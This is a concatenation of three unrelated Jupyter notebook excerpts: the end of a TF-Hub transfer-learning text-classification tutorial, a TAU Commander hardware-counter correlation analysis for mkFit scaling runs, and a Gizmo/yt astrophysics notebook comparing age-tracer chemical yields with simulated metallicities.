embedding by embedding each individual word and then combining them with average. One could also use a sequential module (e.g. [Universal Sentence Encoder](https://tfhub.dev/google/universal-sentence-encoder/2) module) to better capture the nature of sentences. Or an ensemble of two or more TF-Hub modules. 5. **Regularization**: to prevent overfitting, we could try to use an optimizer that does some sort of regularization, for example [Proximal Adagrad Optimizer](https://www.tensorflow.org/api_docs/python/tf/compat/v1/train/ProximalAdagradOptimizer). # Advanced: Transfer learning analysis Transfer learning makes it possible to **save training resources** and to achieve good model generalization even when **training on a small dataset**. In this part, we will demonstrate this by training with two different TF-Hub modules: * **[nnlm-en-dim128](https://tfhub.dev/google/nnlm-en-dim128/1)** - pretrained text embedding module, * **[random-nnlm-en-dim128](https://tfhub.dev/google/random-nnlm-en-dim128/1)** - text embedding module that has same vocabulary and network as **nnlm-en-dim128**, but the weights were just randomly initialized and never trained on real data. And by training in two modes: * training **only the classifier** (i.e. freezing the module), and * training the **classifier together with the module**. Let's run a couple of trainings and evaluations to see how using a various modules can affect the accuracy. ``` def train_and_evaluate_with_module(hub_module, train_module=False): embedded_text_feature_column = hub.text_embedding_column( key="sentence", module_spec=hub_module, trainable=train_module) estimator = tf.estimator.DNNClassifier( hidden_units=[500, 100], feature_columns=[embedded_text_feature_column], n_classes=2, optimizer=tf.keras.optimizers.Adagrad(learning_rate=0.003)) estimator.train(input_fn=train_input_fn, steps=1000) train_eval_result = estimator.evaluate(input_fn=predict_train_input_fn) test_eval_result = estimator.evaluate(input_fn=predict_test_input_fn) training_set_accuracy = train_eval_result["accuracy"] test_set_accuracy = test_eval_result["accuracy"] return { "Training accuracy": training_set_accuracy, "Test accuracy": test_set_accuracy } results = {} results["nnlm-en-dim128"] = train_and_evaluate_with_module( "https://tfhub.dev/google/nnlm-en-dim128/1") results["nnlm-en-dim128-with-module-training"] = train_and_evaluate_with_module( "https://tfhub.dev/google/nnlm-en-dim128/1", True) results["random-nnlm-en-dim128"] = train_and_evaluate_with_module( "https://tfhub.dev/google/random-nnlm-en-dim128/1") results["random-nnlm-en-dim128-with-module-training"] = train_and_evaluate_with_module( "https://tfhub.dev/google/random-nnlm-en-dim128/1", True) ``` Let's look at the results. ``` pd.DataFrame.from_dict(results, orient="index") ``` We can already see some patterns, but first we should establish the baseline accuracy of the test set - the lower bound that can be achieved by outputting only the label of the most represented class: ``` estimator.evaluate(input_fn=predict_test_input_fn)["accuracy_baseline"] ``` Assigning the most represented class will give us accuracy of **50%**. There are a couple of things to notice here: 1. Maybe surprisingly, **a model can still be learned on top of fixed, random embeddings**. The reason is that even if every word in the dictionary is mapped to a random vector, the estimator can separate the space purely using its fully connected layers. 2. Allowing training of the module with **random embeddings** increases both training and test accuracy as oposed to training just the classifier. 3. Training of the module with **pre-trained embeddings** also increases both accuracies. Note however the overfitting on the training set. Training a pre-trained module can be dangerous even with regularization in the sense that the embedding weights no longer represent the language model trained on diverse data, instead they converge to the ideal representation of the new dataset.
github_jupyter
# Correlation Analysis Talapas TTbar70 Author: Brain Gravelle (gravelle@cs.uoregon.edu) All this is using the taucmdr python libraries from paratools http://taucommander.paratools.com/ <a href='#top'>top</a><br> ## Imports This section imports necessary libraies, the metrics.py and utilities.py files and sets up the window. <a id='top'></a> ``` # A couple of scripts to set the environent and import data from a .tau set of results from utilities import * from metrics import * # Plotting, notebook settings: %matplotlib inline #plt.rcParams.update({'font.size': 16}) import numbers from IPython.core.display import display, HTML display(HTML("<style>.container { width:100% !important; }</style>")) pd.set_option('display.float_format', lambda x: '%.2e' % x) pd.set_option('display.max_columns',100) pd.set_option('max_colwidth', 70) from IPython.core.interactiveshell import InteractiveShell InteractiveShell.ast_node_interactivity = "all" import copy ``` ## Getting Data <a id='data'></a> TAU Commander uses TAU to run the application and measure it using runtime sampling techniques (similar to Intel VTune). Many customization options are available. For example, we may consider each function regardless of calling context, or we may decide to enable callpath profiling to see each context separately. From the talapas_scaling application the following experiments are available. These use Talapas (with 28 thread Broadwell processors) and the build-ce (realistic) option for mkFit. The first six experiments use the --num-thr option to set the thread count which is intended to perform threading within the events. the last two add the --num-ev-thr option to set the event threads, so that all threads are used to process events in parallel and each event is processed by a single thread. * manual_scaling_Large_talapas * manual_scaling_Large_talapas_fullnode * manual_scaling_TTbar70_talapas * manual_scaling_TTbar70_talapas_fullnode * manual_scaling_TTbar35_talapas * manual_scaling_TTbar35_talapas_fullnode * ev_thr_scaling_Large_talapas * ev_thr_scaling_Large_talapas_fullnode Additionally available in the cori_scaling application are the following. These were run on NERSC's Cori on the KNL with the default memory settings (quad - 1 NUMA domain, cache - MCDRAM as direct mapped cache). See http://www.nersc.gov/users/computational-systems/cori/running-jobs/advanced-running-jobs-options/ for more info on the KNL modes. Similar to the talapas scaling they use the build-ce option and threading within each event. * manual_scaling_TTbar35 * manual_scaling_TTbar70 * manual_scaling_Large * mixed_thr_scaling_Large - this is bad ### Importing Scaling Data - Talapas TTbar70 is current Here we import the data. In this case we are using Cori data from the experiments with the threads working within each event using the TTbar70 file. Note that this box will take an hour or more to run; please go enjoy a coffee while you wait. ``` application = "talapas_scaling" experiment = "manual_scaling_TTbar70_talapas_fullnode" # experiment = "manual_scaling_Large_talapas" # experiment = "ev_thr_scaling_Large_talapas" # application = "cori_scaling" # experiment = "manual_scaling_TTbar35" # experiment = "manual_scaling_TTbar70" # experiment = "manual_scaling_Large" # experiment = "mixed_thr_scaling_Large" path = ".tau/" + application + "/" + experiment + "/" # note that this function takes a long time to run, so only rerun if you must metric_data = get_pandas_scaling(path, callpaths=True) if application == "talapas_scaling": metric_data = remove_erroneous_threads(metric_data, [1, 8, 16, 32, 48, 56]) elif application == "cori_scaling": print(metric_data.keys()) metric_data = remove_erroneous_threads(metric_data, [1, 4, 8, 16, 32, 48, 64, 80, 96, 112, 128, 144, 160, 176, 192, 208, 224, 240, 256]) ``` ## Adding metrics <a id='metrics'></a> metrics are available in metrics.py. At this time the following can be added: * add_IPC(metrics) - Instructions per Cycle * add_CPI(metrics) - Cycles per instruction * add_VIPC(metrics) - vector instructions per cycle * add_VIPI(metrics) - vector instructions per instruction (i.e. fraction of total) * add_L1_missrate(metrics) - miss rate for L1 cache for scaling data please use the add_metric_to_scaling_data(data, metric_func) function to add a metric Here we add some predeefined metrics and print the top 10 functions with the best IPC ``` add_metric_to_scaling_data(metric_data, add_CPI) add_metric_to_scaling_data(metric_data, add_IPC) add_metric_to_scaling_data(metric_data, add_L1_missrate) add_metric_to_scaling_data(metric_data, add_L2_missrate) if application == 'cori_scaling': llc = True add_metric_to_scaling_data(metric_data, add_VIPI) else: llc = False # add_metric_to_scaling_data(metric_data, add_DERIVED_SP_VOPO) add_metric_to_scaling_data(metric_data, add_L3_missrate, llc) add_metric_to_scaling_data(metric_data, add_DERIVED_BRANCH_MR) print_available_metrics(metric_data, scaling=True) print(metric_data.keys()) # To test # metric_data[32]['DERIVED_SP_VOPO'].sort_values(by='Exclusive',ascending=False).head(10) ``` #### Combining metrics ``` thr_li = metric_data.keys() alldata = {} for thr in thr_li: alldata[thr] = combine_metrics(metric_data[thr],inc_exc='Exclusive') ``` ## Correlations <a id='corr'></a> ``` THREAD_CNT = 8 metric_li = ['PAPI_TOT_CYC','PAPI_RES_STL'] corrs = [alldata[THREAD_CNT].corr('pearson').fillna(0)[metric_li], alldata[THREAD_CNT].corr('kendall').fillna(0)[metric_li], alldata[THREAD_CNT].corr('spearman').fillna(0)[metric_li]] corr_data = corrs[0][['PAPI_TOT_CYC']].copy() corr_data['p_' + metric_li[0]] = corr_data[metric_li[0]] corr_data['p_' + metric_li[1]] = corrs[0][metric_li[1]] corr_data['k_' + metric_li[0]] = corrs[1][metric_li[0]] corr_data['k_' + metric_li[1]] = corrs[1][metric_li[1]] corr_data['s_' + metric_li[0]] = corrs[2][metric_li[0]] corr_data['s_' + metric_li[1]] = corrs[2][metric_li[1]] corr_data.drop(['PAPI_TOT_CYC'],axis=1,inplace=True) corr_data.style.format("{:.2%}").background_gradient(cmap=cm) ``` ## Correlations <a id='corr'></a> ``` THREAD_CNT = 32 cm = sns.light_palette("yellow", as_cmap=True) pcorr = get_corr(alldata[THREAD_CNT]) kcorr = get_corr(alldata[THREAD_CNT], method='kendall') scorr = get_corr(alldata[THREAD_CNT], method='spearman') metric_li = ['PAPI_TOT_CYC','PAPI_RES_STL'] corrs = [alldata.corr('pearson').fillna(0)[metric_li], alldata.corr('kendall').fillna(0)[metric_li], alldata.corr('spearman').fillna(0)[metric_li]] corr_data = corrs[0][['PAPI_TOT_CYC']].copy() corr_data['p_' + metric_li[0]] = corr_data[metric_li[0]] corr_data['p_' + metric_li[1]] = corrs[0][metric_li[1]] corr_data['k_' + metric_li[0]] = corrs[1][metric_li[0]] corr_data['k_' + metric_li[1]] = corrs[1][metric_li[1]] corr_data['s_' + metric_li[0]] = corrs[2][metric_li[0]] corr_data['s_' + metric_li[1]] = corrs[2][metric_li[1]] corr_data.drop(['PAPI_TOT_CYC'],axis=1,inplace=True) corr_data.style.format("{:.2%}").background_gradient(cmap=cm) ``` ## Correlations <a id='corr'></a> ``` THREAD_CNT = 56 cm = sns.light_palette("yellow", as_cmap=True) pcorr = get_corr(alldata[THREAD_CNT]) kcorr = get_corr(alldata[THREAD_CNT], method='kendall') scorr = get_corr(alldata[THREAD_CNT], method='spearman') metric_li = ['PAPI_TOT_CYC','PAPI_RES_STL'] corrs = [alldata.corr('pearson').fillna(0)[metric_li], alldata.corr('kendall').fillna(0)[metric_li], alldata.corr('spearman').fillna(0)[metric_li]] corr_data = corrs[0][['PAPI_TOT_CYC']].copy() corr_data['p_' + metric_li[0]] = corr_data[metric_li[0]] corr_data['p_' + metric_li[1]] = corrs[0][metric_li[1]] corr_data['k_' + metric_li[0]] = corrs[1][metric_li[0]] corr_data['k_' + metric_li[1]] = corrs[1][metric_li[1]] corr_data['s_' + metric_li[0]] = corrs[2][metric_li[0]] corr_data['s_' + metric_li[1]] = corrs[2][metric_li[1]] corr_data.drop(['PAPI_TOT_CYC'],axis=1,inplace=True) corr_data.style.format("{:.2%}").background_gradient(cmap=cm) ```
github_jupyter
``` %matplotlib inline import numpy as np import matplotlib.pyplot as plt import yt from galaxy_analysis.gizmo import yield_model from galaxy_analysis.utilities import cy_convert_abundances as ca #from galaxy_analysis.utilities import convert_abundances as ca from galaxy_analysis.plot.plot_styles import * from matplotlib.ticker import (MultipleLocator, FormatStrFormatter, AutoMinorLocator) import gizmo_analysis as gizmo import utilities as gizmo_ut from scipy.stats import ks_2samp input_type = 'mass' # # How to generate yields: # simulation = 'm12q' wdir = "/home/aemerick/work/gizmo_runs/m12q_res5700_test/" #simulation = 'm10q_fiducial_post_constFB' #wdir = "/home/aemerick/work/gizmo_runs/m10q_test/full_fire_contFB/" #simulation = 'm10q_fiducial_post' #wdir = "/home/aemerick/work/gizmo_runs/m10q_test/full_fire_fiducial/" age_bins = yield_model.get_bins(config_file = wdir + "/gizmo.out", binfile = wdir+"/age_bins.txt") Z = 1.0E-3 FIRE_Z_scaling = True age_is_fraction = True total_yields = yield_model.construct_yields(age_bins/1000.0, # pass bins as Gyr, Z = Z, Z = Z, yieldtype = 'total', FIRE_Z_scaling=FIRE_Z_scaling) # load ds and generate yields #np.log10(ds0.hubble_constant) ds0 = yt.load(wdir + 'output/snapshot_000.hdf5') data0 = ds0.all_data() fields = ds0.field_list # generate yield_model.generate_metal_fields(ds0,_agebins=age_bins,_yields=total_yields, age_is_fraction=age_is_fraction) #yield_model._generate_star_metal_fields(ds0, _agebins = age_bins, _yields = total_yields) metals = np.unique([x[1] for x in ds0.field_list if ((x[0] == 'PartType0') and ('Metal' in x[1]))]) initial_abundance=np.zeros(15) for i in np.arange(np.size(initial_abundance)): z = data0[('PartType0','Metallicity_%02i'%(i))] print("%5.5E %5.5E %5.5E"%(np.min(z),np.max(z),np.average(z))) initial_abundance[i] = np.average(z).value #print(np.min(z).value,np.average(z).value,np.max(z).value) logH = np.log10(ds0.hubble_constant) ds = yt.load(wdir + 'output/snapshot_479.hdf5') data = ds.all_data() fields = ds.field_list # generate yield_model.generate_metal_fields(ds,_agebins=age_bins,_yields=total_yields,age_is_fraction=age_is_fraction) yield_model._generate_star_metal_fields(ds, _agebins = age_bins, _yields = total_yields,age_is_fraction=age_is_fraction) ptypes = np.unique([x[0] for x in ds.field_list]) metals = np.unique([x[1] for x in ds.field_list if ((x[0] == 'PartType0') and ('Metal' in x[1]))]) print(np.min(data[('PartType0','particle_mass')].to('Msun'))) M_norm = np.min(data[('PartType0','particle_mass')].to('Msun') ) print(np.median(data[('PartType4','Metallicity_00')])) print(np.average(data[('PartType4','Metallicity_00')])) x = data[('all','PartType0_O_mass')] print(np.min(x),np.max(x)) part = gizmo.io.Read.read_snapshots(['star'], 'index', 342, assign_host_principal_axes=True, simulation_directory = wdir) print(part.host_positions) SpeciesProfile = gizmo_ut.particle.SpeciesProfileClass(scaling='log', limits=[0.1, 10], width=0.1, dimension_number=2) pro = SpeciesProfile.get_sum_profiles(part, 'star', 'mass', rotation=True, other_axis_distance_limits=[0, 1]) SpeciesProfile.get_sum_profiles? SpeciesProfile.get_sum_profiles? part.host_positions print(ds.mass_unit.to('g/h').value / ds.mass_unit.to('g').value) #ds.derived_field_list normal = part.host_rotation_tensors[0] center = part.host_positions[0] #region = #ds.disk(center, normal, 20000, 4000) region = ds.box(center - 20000, center + 20000) yfield = [ ('all','PartType0_O_actual_mass'),('all','PartType0_O_mass'), ('all','PartType0_Fe_actual_mass'),('all','PartType0_Fe_mass'), ('all','PartType0_Mg_actual_mass'),('all','PartType0_Mg_mass') ] xfield = ('PartType0','particle_spherical_position_radius') sp = yt.Profile1D(region, xfield, #('PartType0','Metallicity_00'), x_min = np.min(region[xfield]), x_max =np.max(region[xfield]), x_log=False, x_n = 100, weight_field = None) # ('PartType0','particle_mass') ) #sp.set_log(('PartType0','particle_spherical_position_radius'),False) #sp.set_unit(('PartType0','particle_spherical_position_radius'),'kpc') #sp.set_unit(yfield[0], "Msun") #sp.set_unit(yfield[1], "Msun") #sp.show() sp.add_fields(yfield) for i in np.arange(len(yfield)): sp.set_field_unit(yfield[i], "Msun") pm = data[('PartType0','particle_mass')].to('Msun') ageO = data[('all','PartType0_O_mass')] / ds0.hubble_constant + initial_abundance[4]*pm actualO = pm * data[('PartType0','Metallicity_04')] select = data[('PartType0','Temperature')] > 1.0E6 diff = np.abs((ageO[select] - actualO[select]) / actualO[select]) print (np.average(diff)) ds.add_field? parttype = 'PartType4' e = 'O' def fractional_diff4(field, data): pm = data[(parttype, 'particle_mass')].to('Msun') ageO = data[('all',parttype + '_' + e + '_mass')] / ds0.hubble_constant + initial_abundance[4]*pm actualO = pm * data[(parttype,'Metallicity_04')] fractional_diff = np.abs((ageO - actualO) / actualO) return fractional_diff def fractional_diff4_2(field, data): pm = data[(parttype, 'particle_mass')].to('Msun') ageO = data[('all',parttype + '_' + e + '_mass')] + initial_abundance[4]*pm actualO = pm * data[(parttype,'Metallicity_04')] fractional_diff = np.abs((ageO - actualO) / actualO) return fractional_diff ds.add_field(('all',parttype + '_O_fractional_diff4'), function=fractional_diff4, units='', particle_type = 'PartType4') ds.add_field(('all',parttype + '_O_fractional_diff4_2'), function=fractional_diff4_2, units='', particle_type = 'PartType4') #diff_one = data[('all','PartType4_O_fractional_diff4')] #diff_two = data[('all','PartType4_O_fractional_diff4_2')] print(np.min(diff_one),np.max(diff_one),np.average(diff_one)) print(np.min(diff_two),np.max(diff_two),np.average(diff_two)) data[('PartType0','particle_mass')] #x = np.log10(data[(parttype + '_' + e + '_fractional_diff3')]) #hist,bins = np.histogram( x, bins = np.arange(-20,2,0.1)) #ax.step(bins[:-1],hist / (1.0*np.sum(hist)),where='post') #x = np.log10(data[(parttype + '_' + e + '_fractional_diff2')]) #hist,bins = np.histogram( x, bins = np.arange(-20,2,0.1)) #ax.step(bins[:-1],hist / (1.0*np.sum(hist)),where='post') e = 'O' #x = np.log10(data[(parttype + '_' + e + '_fractional_diff')]) #hist,bins = np.histogram( x, bins = np.arange(-20,2,0.1)) #ax.step(bins[:-1],hist / (1.0*np.sum(hist)),where='post') fig,ax = plt.subplots(1,2) fig.set_size_inches(12,6) parttype = 'PartType0' pm = data[(parttype, 'particle_mass')].to('Msun') ageO = data[('all',parttype + '_' + e + '_mass')].to('Msun') + initial_abundance[4]*pm actualO = pm * data[(parttype,'Metallicity_04')] print(np.average(actualO/ageO)) temp = data[('all',parttype + '_' + e + '_mass')] #temp[temp<=0.0] = 1.0E-20 print(np.max(actualO / (temp/ ds0.hubble_constant))) #print(np.average()) print(np.sum(ageO)/1.0E6, np.sum(actualO)/1.0E6, np.sum(actualO)/np.sum(ageO)) hist,bins = np.histogram( np.log10(ageO), bins = np.arange(-2,6,0.1)) ax[0].step(bins[:-1], hist/(1.0*np.sum(hist)), where = 'post', label = 'Age') hist,bins = np.histogram( np.log10(actualO), bins = np.arange(-2,6,0.1)) ax[0].step(bins[:-1], hist/(1.0*np.sum(hist)), where = 'post', label = 'Actual') parttype = 'PartType4' pm = data[(parttype, 'particle_mass')].to('Msun') ageO = data[('all',parttype + '_' + e + '_mass')] + initial_abundance[4]*pm actualO = pm * data[(parttype,'Metallicity_04')] hist,bins = np.histogram( np.log10(ageO), bins = np.arange(-2,6,0.1)) ax[1].step(bins[:-1], hist/(1.0*np.sum(hist)), where = 'post', label = 'Age') hist,bins = np.histogram( np.log10(actualO), bins = np.arange(-2,6,0.1)) ax[1].step(bins[:-1], hist/(1.0*np.sum(hist)), where = 'post', label = 'Actual') ax[1].semilogy() ax[0].semilogy() ax[0].legend(loc='best') for a in ax: a.set_xlim(-2,5) #plt.semilogx() age_vals = np.array([data[('PartType0',"Metallicity_%02i"%(15+i))] for i in np.arange(np.size(age_bins) - 1)]) print(np.shape(age_vals)) print(np.shape(total_yields[:,4])) x = np.matmul(total_yields[:,4].T, age_vals) * data[('PartType0','particle_mass')].to('code_mass').value * yt.units.Msun x = x / ds0.hubble_constant + data[('PartType0','particle_mass')].to('Msun') * initial_abundance[4] print(np.sum( data0[('PartType0','particle_mass')].to('Msun') * initial_abundance[4] )) print(x[1000]) print((data[('all','PartType0_O_mass')]/ds.hubble_constant + data[('PartType0','particle_mass')].to('Msun')*initial_abundance[3])[1]) print(data[('all','PartType0_O_actual_mass')][1]) np.average(x / data[('all','PartType0_O_actual_mass')]) parttype = 'PartType0' pm = data[(parttype, 'particle_mass')].to('Msun') ageO = data[('all',parttype + '_' + e + '_mass')] + initial_abundance[4]*pm actualO = pm * data[(parttype,'Metallicity_04')] select = actualO > 5.0E3 #print(actualO[select]/ageO[select]) x = data[('PartType0','Temperature')] x = x[select] print(np.min(x),np.max(x),np.quantile(x,0.25),np.median(x),np.quantile(x,0.75),np.average(x)) x = data[('PartType0','Density')].to('g/cm**3') x = x[select] print(np.min(x),np.max(x),np.quantile(x,0.25),np.median(x),np.quantile(x,0.75),np.average(x)) region = ds.sphere(part.host_positions[0], 20000) x1 = part.host_positions[0][0] - data[('PartType0','particle_position_x')].to('kpccm').value y1 = part.host_positions[0][1] - data[('PartType0','particle_position_y')].to('kpccm').value z1 = part.host_positions[0][2] - data[('PartType0','particle_position_z')].to('kpccm').value x = np.sqrt(x1*x1 + y1*y1 + z1*z1) x = x[select] print(np.min(x),np.max(x),np.quantile(x,0.25),np.median(x),np.quantile(x,0.75),np.average(x)) hist,bins = np.histogram(x, bins = np.arange(0.0,1000.0,10.)) plt.step(bins[:-1],hist,lw=3,color='black',where='post') plt.xlabel('Radius (kpc)') x = data[('PartType0','particle_mass')].to('Msun') x = x[select] print(np.min(x),np.max(x),np.quantile(x,0.25),np.median(x),np.quantile(x,0.75),np.average(x)) yt.units.kpc parttype = 'PartType0' e = 'O' def fractional_diff(field, data): pm = data[(parttype, 'particle_mass')].to('Msun') ageO = data[('all',parttype + '_' + e + '_mass')] + initial_abundance[4]*pm actualO = pm * data[(parttype,'Metallicity_04')] fractional_diff = np.abs((ageO - actualO) / actualO) return fractional_diff ds.add_field(('all',parttype + '_O_fractional_diff'), function=fractional_diff, units='', particle_type = 'PartType0') def fractional_diff2(field, data): pm = data[(parttype, 'particle_mass')].to('Msun') ageO = data[('all',parttype + '_' + e + '_mass')] + initial_abundance[4]*pm actualO = pm * data[(parttype,'Metallicity_04')] fractional_diff = np.abs((ageO - actualO) / actualO) return fractional_diff ds.add_field(('all',parttype + '_O_fractional_diff2'), function=fractional_diff2, units='', particle_type = 'PartType0') def fractional_diff3(field, data): pm = data[(parttype, 'particle_mass')].to('Msun') ageO = data[('all',parttype + '_' + e + '_mass')] + initial_abundance[4]*pm actualO = pm * data[(parttype,'Metallicity_04')] fractional_diff = np.abs((ageO - actualO) / actualO) return fractional_diff ds.add_field(('all',parttype + '_O_fractional_diff3'), function=fractional_diff3, units='', particle_type = 'PartType0') xaxisfield = ('PartType0','Density') pp = yt.PhasePlot(ds, xaxisfield, (parttype + '_' + e + '_fractional_diff3'), ('PartType0','particle_mass'), weight_field=None) pp.set_ylim(1.0E-6,200.0) pp.set_log(('all','PartType0_O_fractional_diff3'),True) pp.set_log(xaxisfield,True) pp.set_unit(('PartType0','particle_mass'),'Msun') #pp.set_log(('PartType0','Temperature'),True) pp.show() yt.PhasePlot? print(data[('PartType0','particle_mass')].to('Msun')[0].to('Msun/h')) print(data[('PartType0','particle_mass')].to('Msun')[0].to('Msun')) #print(data[('PartType0','particle_mass')].to('Msun')[0].to('gcm')) fig, ax = plt.subplots() y1 = sp[('all','PartType0_Mg_actual_mass')].value y2 = sp[('all','PartType0_Mg_mass')].value #ax.plot( sp.x, y1, color = 'C0', lw = 3) #ax.plot( sp.x, y2, color = 'C1', lw = 3) ax.plot(sp.x.to('kpccm'), y1/y2) #ax.semilogy() def _get_abund(e,dat,ptype='star'): if ptype == 'star': ptype = "PartType4" elif ptype == 'gas': ptype = "PartType0" if e == "H": return 1.0 - dat[(ptype,"Metallicity_00")] - dat[(ptype,"Metallicity_01")] else: ei = yield_model.elements.index(e) return dat[(ptype,"Metallicity_%02i"%(ei))] # # Now plot for age tracers # littleh = 1.0 def _get_age_abund(e,dat,ptype='star'): if ptype == 'star': ptype = "PartType4" elif ptype == 'gas': ptype = "PartType0" if e == "H": # H_frac = 1.0 - dat[(ptype,"Metallicity_00")] - dat[(ptype,"Metallicity_01")] M = dat[(ptype,'particle_mass')].to('Msun') H_frac = M*(1.0-initial_abundance[0]-initial_abundance[1])-\ dat[('all',ptype+'_Total_mass')] / littleh - dat[('all',ptype+'_He_mass')] / littleh H_frac = H_frac / dat[(ptype,'particle_mass')].to('Msun') return H_frac else: ei = yield_model.elements.index(e) # very bad!!! mass = dat[('all', ptype + '_' + e + '_mass')].to('Msun') / littleh norm = dat[(ptype,'particle_mass')].to('Msun') # M_norm # (16752.063237698454*yt.units.Msun) Z = mass / norm Z = Z + initial_abundance[yield_model.elements.index(e)] return Z# mass/norm #+ initial_abundance[yield_model.elements.index(e)] def get_ratio(e1,e2,dat,age=True): if age: vals1 = _get_age_abund(e1,dat) vals2 = _get_age_abund(e2,dat) else: vals1 = _get_abund(e1,dat) vals2 = _get_abund(e2,dat) return ca.abundance_ratio_array(e1,vals1,e2,vals2, input_type=input_type) # # Lets try and plot O / Fe vs Fe / H # for the fiducial fire stuff # elements y1e,y2e = "O", "Fe" x1e,x2e = "Fe", "H" # #y1, y2 = yield_model.elements.index(y1e), yield_model.elements.index(y2e) #x1, x2 = yield_model.elements.index(x1e), yield_model.elements.index(x2e) y1_vals = _get_abund(y1e,data) y2_vals = _get_abund(y2e,data) y1y2 = ca.abundance_ratio_array(y1e, y1_vals, y2e, y2_vals, input_type=input_type) x1_vals = _get_abund(x1e,data) x2_vals = _get_abund(x2e,data) x1x2 = ca.abundance_ratio_array(x1e, x1_vals, x2e, x2_vals, input_type = input_type) fig, ax = plt.subplots() fig.set_size_inches(8,8) ax.scatter(x1x2, y1y2, color = "black", s = 60, marker="o", label = "FIRE") y1_vals = _get_age_abund(y1e,data) y2_vals = _get_age_abund(y2e,data) age_y1y2 = ca.abundance_ratio_array(y1e, y1_vals, y2e, y2_vals, input_type=input_type) x1_vals = _get_age_abund(x1e,data) x2_vals = _get_age_abund(x2e,data) age_x1x2 = ca.abundance_ratio_array(x1e, x1_vals, x2e, x2_vals, input_type = input_type) print(np.min(y1y2),np.max(y1y2)) print(np.min(x1x2),np.max(x1x2)) ax.scatter(age_x1x2, age_y1y2, color = "C0", s = 60, marker="o", label = "Age Tracer") ax.set_ylabel("[" + y1e + "/" + y2e + "]") ax.set_xlabel("[" + x1e + "/" + x2e + "]") ax.legend(loc='best') ax.set_xlim(-5,1) ax.set_ylim(-3,3) plt.minorticks_on() plt.tight_layout() #x1e = 'O' #x2e = 'H' def MDF(x1e,x2e,data,rmin=None,rmax=None,dbin=0.25, age=True, ptype='star', diff = False, absval=False): """ Return MDF """ if (absval) and (not diff): print("Are you sure you want to take the absolute value of hte abundance if it is not a diff?") raise ValueError if diff: x1_vals_age = _get_age_abund(x1e,data,ptype=ptype) x2_vals_age = _get_age_abund(x2e,data,ptype=ptype) x1_vals = _get_abund(x1e,data,ptype=ptype) x2_vals = _get_abund(x2e,data,ptype=ptype) abund_age = ca.abundance_ratio_array(x1e, x1_vals_age, x2e, x2_vals_age, input_type=input_type) abund = ca.abundance_ratio_array(x1e, x1_vals, x2e, x2_vals, input_type=input_type) cutvals1 = _get_abund('O',data,ptype=ptype) cutvals2 = _get_abund('H',data,ptype=ptype) H_cut = ca.abundance_ratio_array('O',cutvals1,'H',cutvals2,input_type=input_type) #abund = abund[ (H_cut > -2.6)] #abund_age = abund_age[ (H_cut > -2.6)] if absval: abund = np.abs(abund - abund_age) # diff else: abund = abund-abund_age else: if age: x1_vals = _get_age_abund(x1e,data,ptype=ptype) x2_vals = _get_age_abund(x2e,data,ptype=ptype) else: x1_vals = _get_abund(x1e,data,ptype=ptype) x2_vals = _get_abund(x2e,data,ptype=ptype) abund = ca.abundance_ratio_array(x1e, x1_vals, x2e, x2_vals, input_type=input_type) if ptype == 'gas': cutvals1 = _get_abund('O',data,ptype=ptype) cutvals2 = _get_abund('H',data,ptype=ptype) H_cut = ca.abundance_ratio_array('O',cutvals1,'H',cutvals2,input_type=input_type) abund = abund[ (H_cut > -2.6)] if rmin is None: rmin = np.min(abund) if rmax is None: rmax = np.max(abund) nbins = int((rmax - rmin)/dbin) hist, bins = np.histogram(abund, bins = nbins, range = (rmin,rmax)) hist2 = np.ones(np.size(hist)+1) hist2[:-1] = hist hist2[-1] = hist2[-2] stats = {'median' : np.median(abund), 'mean' : np.average(abund), 'Q1' : np.quantile(abund,0.25), 'Q3' : np.quantile(abund,0.75), 'IQR' : np.quantile(abund,0.75) - np.quantile(abund,0.25), 'std' : np.std(abund)} # compute fraction < a given offset if diff: stats['0.2dex'] = np.size( abund[ np.abs(abund) < 0.2 ]) / (1.0*np.size(abund)) stats['0.1dex'] = np.size( abund[ np.abs(abund) < 0.1 ]) / (1.0*np.size(abund)) stats['0.05dex'] = np.size( abund[ np.abs(abund) < 0.05 ]) / (1.0*np.size(abund)) stats['0.02dex'] = np.size( abund[ np.abs(abund) < 0.02 ]) / (1.0*np.size(abund)) stats['0.01dex'] = np.size( abund[ np.abs(abund) < 0.01 ]) / (1.0*np.size(abund)) stats['0.005dex'] = np.size( abund[ np.abs(abund) < 0.005]) / (1.0*np.size(abund)) if diff: return bins,hist2,stats else: return bins, hist2 ca.abundance_ratio_array?? fig,ax = plt.subplots(2,5,sharey=True,sharex=True) fig.set_size_inches(16,8) fig.subplots_adjust(wspace=0,hspace=0) xy = (0.8,0.90) def plot_ax(ax, e1, e2, data,db=0.1,amin=-4,amax=3): bins, hist1 = MDF(e1,e2,data,amin,amax,age=False,dbin=db) ax.step(bins, hist1/(1.0*np.sum(hist1)), where='post',lw=3,color='black') bins, hist2 = MDF(e1,e2,data,amin,amax,age=True,dbin=db) ax.step(bins, hist2/(1.0*np.sum(hist2)), where='post',lw=3,color='C0') ax.annotate('[' + e1 + '/'+ e2 + ']', xy=xy,xycoords='axes fraction') #x1 = part['star'].prop('massfraction.' + str.lower(e1)).astype(np.double) #x2 = part['star'].prop('massfraction.' + str.lower(e2)).astype(np.double) #x = ca.abundance_ratio_array(e1, x1, e2, x2, input_type=input_type) #abund = x #print(e1,e2,np.min(x),np.mean(x),np.median(x),np.max(x)) #nbins = int((amax - amin)/db) #hist, bins = np.histogram(abund, bins = nbins, range = (amin,amax)) #hist2 = np.ones(np.size(hist)+1) #hist2[:-1] = hist #hist2[-1] = hist2[-2] #ax.step(bins,hist2/(1.0*np.sum(hist2)), where='post',lw=3,color='C1') ksval = ks_2samp(hist1,hist2) #ax.annotate('ks_D = %0.3f \n - p = %.3f'%(ksval[0],ksval[1]),xy=(0.02,xy[1]-0.05),xycoords='axes fraction') return plot_ax(ax[(0,0)],'C','H',data) plot_ax(ax[(0,1)],'N','H',data) plot_ax(ax[(0,2)],'O','H',data) plot_ax(ax[(0,3)],'Ne','H',data) plot_ax(ax[(0,4)],'Mg','H',data) plot_ax(ax[(1,0)],'Si','H',data) plot_ax(ax[(1,1)],'S','H',data) plot_ax(ax[(1,2)],'Ca','H',data) plot_ax(ax[(1,3)],'Fe','H',data) plot_ax(ax[(1,4)],'Mg','Fe',data,amin=-3,amax=3) for ax1 in ax: for ax2 in ax1: ax2.set_ylim(0,0.2) ax[(0,0)].set_ylabel('Fraction') ax[(1,0)].set_ylabel('Fraction') plt.minorticks_on() outname = simulation + '_stellar_MDFs.png' fig.savefig(outname) fig,ax = plt.subplots(2,5,sharey=True,sharex=True) fig.set_size_inches(16,8) fig.subplots_adjust(wspace=0,hspace=0) xy = (0.8,0.90) def plot_ax(ax, e1, e2, 